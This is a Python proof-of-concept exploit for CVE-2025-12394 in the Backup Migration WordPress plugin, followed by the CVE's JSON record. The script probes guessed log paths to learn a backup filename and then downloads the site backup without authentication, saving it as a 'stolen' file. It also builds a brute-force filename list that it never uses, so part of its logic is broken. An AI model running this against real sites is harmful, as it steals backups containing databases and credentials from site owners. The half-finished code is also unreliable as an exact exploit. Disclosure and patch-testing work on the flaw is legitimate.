CVE-2025-12394

import requests import re import os # CVE-2025-12394 PoC - Backup Migration WordPress Plugin Unauthorized Backup Download # Target: WordPress site with vulnerable Backup Migration plugin < 2.0.0 target = "http://target-wordpress-site.com" backup_endpoint = f"{target}/wp-content/backup-migration/" def exploit_cve_2025_12394(): """ Exploitation steps: 1. Fetch log file to disclose backup filename 2. Construct backup path using disclosed information 3. Download the backup archive without authentication """ # Step 1: Try to access the backup log file that discloses backup filename log_paths = [ "/wp-content/backups-dump.php", "/wp-content/backup-migration/log.php", "/wp-content/backup-migration/config.txt", "/wp-content/backups/info.txt" ] backup_filename = None for log_path in log_paths: try: response = requests.get(f"{target}{log_path}", timeout=10) if response.status_code == 200: # Extract backup filename from log content match = re.search(r'backup[_-]\w+\.zip', response.text) if match: backup_filename = match.group(0) print(f"[+] Found backup filename: {backup_filename}") break except requests.RequestException as e: print(f"[-] Error accessing {log_path}: {e}") if not backup_filename: # Alternative: Brute force common backup filename patterns print("[*] Log file not accessible, attempting filename brute force...") common_patterns = [ f"backup_{hash(target)}.zip", f"backup-{hash(target)}.zip" ] # Add common date-based patterns import datetime for i in range(30): date = datetime.datetime.now() - datetime.timedelta(days=i) common_patterns.append(f"backup_{date.strftime('%Y%m%d')}.zip") # Step 2 & 3: Download backup if filename is known if backup_filename: backup_urls = [ f"{target}/wp-content/backups/{backup_filename}", f"{target}/wp-content/backup-migration/backups/{backup_filename}", f"{target}/wp-content/{backup_filename}" ] for url in backup_urls: print(f"[*] Trying to download from: {url}") response = requests.get(url, timeout=30) if response.status_code == 200 and len(response.content) > 1000: # Save the backup file output_file = f"stolen_backup_{backup_filename}" with open(output_file, 'wb') as f: f.write(response.content) print(f"[+] SUCCESS! Backup downloaded: {output_file}") print(f"[+] File size: {len(response.content)} bytes") return True print("[-] Exploitation failed - backup not found or inaccessible") return False if __name__ == "__main__": exploit_cve_2025_12394()

{"cve": {"id": "CVE-2025-12394", "sourceIdentifier": "[email protected]", "published": "2025-11-24T06:15:45.923", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Backup Migration WordPress plugin before 2.0.0 does not properly generate its backup path in certain server configurations, allowing unauthenticated users to fetch a log that discloses the backup filename. The backup archive is then downloadable without authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/e61293d0-2e1b-4dac-96c5-97fa17e38b16/", "source": "[email protected]"}]}}